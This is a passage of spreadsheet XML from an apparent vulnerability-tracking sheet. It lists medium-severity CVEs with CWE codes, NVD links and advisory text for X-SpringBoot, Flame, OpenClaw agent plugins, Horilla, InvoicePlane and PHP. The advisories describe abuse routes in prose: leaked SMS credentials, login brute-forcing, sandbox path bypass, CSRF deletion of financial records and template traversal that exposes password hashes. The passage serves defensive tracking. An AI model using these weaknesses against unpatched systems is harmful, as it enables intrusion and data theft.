      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 exposes appKey and appSecret credentials in the GET /application/manager/select endpoint without authentication or field filtering. Unauthenticated attackers can retrieve these credentials and use them to send arbitrary SMS messages through any tenant's SMS provider, enabling SMS bombing and impersonation attacks.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100192</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100501</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>Flame through 2.4.0 contains an improper restriction of excessive authentication attempts vulnerability in the POST /api/auth login endpoint that allows unauthenticated attackers to brute-force the admin password. Attackers can submit unlimited password guesses without rate limiting, attempt counters, lockouts, or delays to gain full administrator access and modify application configuration.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100501</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100531</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>The @openclaw/slack npm package before 2026.8.1 contains an authorization flaw in its Slack download-file handler: when a file lacks the share metadata used to prove it belongs to the requested conversation, the conversation-authorization check fails open. An authenticated caller restricted to a single conversation who knows or obtains a file identifier can therefore download file contents from outside that conversation's scope, disclosing data across configured conversation boundaries. The issue does not allow listing arbitrary Slack files and does not bypass Slack authentication itself. The issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100531</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100536</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 fail to validate all source fields in structured message attachments, allowing attackers to hide unvalidated host paths behind allowed attachment sources. Attackers can exploit this by providing multiple source fields to bypass sandbox path validation and cause Telegram delivery to read and send known host files that would otherwise be rejected.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100536</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100538</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 does not apply the originating sender's global or per-agent toolsBySender policy when handling outbound attachments. A sender that has been explicitly denied filesystem read tools can still cause a known local file to be read and returned via a final-response media directive or a message attachment, disclosing local file contents to an admitted requester whose agent turn did not include the read tool. Exploitation requires knowledge or derivation of a useful host path and a delivery flow that accepts local attachments. The issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100538</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100566</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>OpenClaw LINE versions before 2026.8.1 contain an access control vulnerability where group allowlist mode silently inherits DM allowFrom values when groupAllowFrom is not explicitly configured. Attackers with group participation can trigger the agent despite configured group allowlist restrictions when DM access is broader than intended group access.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100566</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100582</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr">
        <is>
          <t>react, go, gin, rust</t>
        </is>
      </c>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>OpenClaw channel plugins (@openclaw/msteams, @openclaw/feishu, @openclaw/matrix, and @openclaw/googlechat) before 2026.8.1 do not enforce the configured channel read allowlist for caller-supplied explicit read targets in message, reaction, pin, member, and related metadata read actions. A lower-trust sender or a steered agent with access to a channel read action can therefore retrieve content or metadata from channels or rooms excluded by the operator's read policy; the practical impact depends on the permissions held by the connected bot account. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100582</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100594</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 contain an authorization bypass vulnerability in the /export-trajectory endpoint that allows non-owner senders to request and receive owner-only trajectory bundles. Attackers can access prompts, model messages, tool schemas, runtime events, and local path metadata from affected sessions by exploiting insufficient authorization checks.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100594</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100595</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 contain an authorization bypass vulnerability in the diagnostics export command that allows non-owner channel senders to access owner-only host diagnostic bundles. Attackers can request and receive diagnostic details about the host, configuration, runtime, and connected services intended only for owners.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100595</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63431</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. In 1.5.0-85 and earlier, payroll/views/component_views.py does not consistently authorize access in allowances_deductions_tab, view_single_allowance, and view_single_deduction before loading records selected by emp_id, allowance_id, or deduction_id. An authenticated employee can substitute those identifiers to read another employee's salary structure, allowance and deduction amounts, personal loan disbursements, and repayment schedules without owning the record or holding payroll-view permissions. No complete fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63431</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63432</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>django, go</t>
        </is>
      </c>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-94</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. From 1.0.0 until 1.6.0 and 2.0.0, the get_mail_preview handlers in recruitment/views/actions.py and employee/not_in_out_dashboard.py render a user-controlled body at /recruitment/get-mail-preview/ and /employee/get-employee-mail-preview with the full request object in the Django template context. An authenticated user with a valid CSRF token can use template attribute traversal to read request.user.password, request.META, and related-user attributes, exposing password hashes, personal data, and server request metadata. Django template restrictions prevent arbitrary code execution through this primitive, so the demonstrated impact is information disclosure and possible offline password cracking or account compromise. This issue is fixed in versions 1.6.0 and 2.0.0.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63432</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85274</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane exposes Recurring::stop() as a state-changing GET route without CSRF token validation. When an authenticated administrator loads attacker-controlled content that requests /invoices/recurring/stop/{id}, the application stops the selected recurring invoice. An attacker can target multiple identifiers to interrupt recurring billing and cause financial loss. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85274</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85289</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane omits ensure_valid_post_request() from delete methods including Payments::delete(), Recurring::delete(), and User_clients::delete(). Although the routes require POST, they do not validate the request's CSRF token. An attacker can submit a cross-origin form through an authenticated administrator's browser to delete financial records and other application data. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85289</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85291</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's Users::change_password() method accepts a user_id from the URL and updates that account's password without an object-level authorization check. An authenticated secondary administrator can target the primary administrator account and replace its password without knowing the current password. The attacker can then take over the primary account and access its data and privileges. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85291</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91767</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr">
        <is>
          <t>openssl, php, hp</t>
        </is>
      </c>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>php_openssl_matches_wildcard_name() in ext/openssl/xp_ssl.c underflows the length argument passed to memchr() when a TLS server certificate presents a wildcard name whose literal characters are together longer than the hostname being verified. A malicious server presenting such a certificate makes the PHP client read up to SIZE_MAX bytes past the end of a heap allocation. The path is reachable from any default client stream, because verify_peer_name is enabled by default.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91767</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91768</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-1023</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>The IPv6 branch of the FastCGI client access check compares only the first 12 bytes of a 16-byte IPv6 address, so listen.allowed_clients matches on a /96 prefix instead of the exact address. An attacker who can source an address sharing the first 96 bits with an allowed one passes the check and reaches the FastCGI endpoint.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91768</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
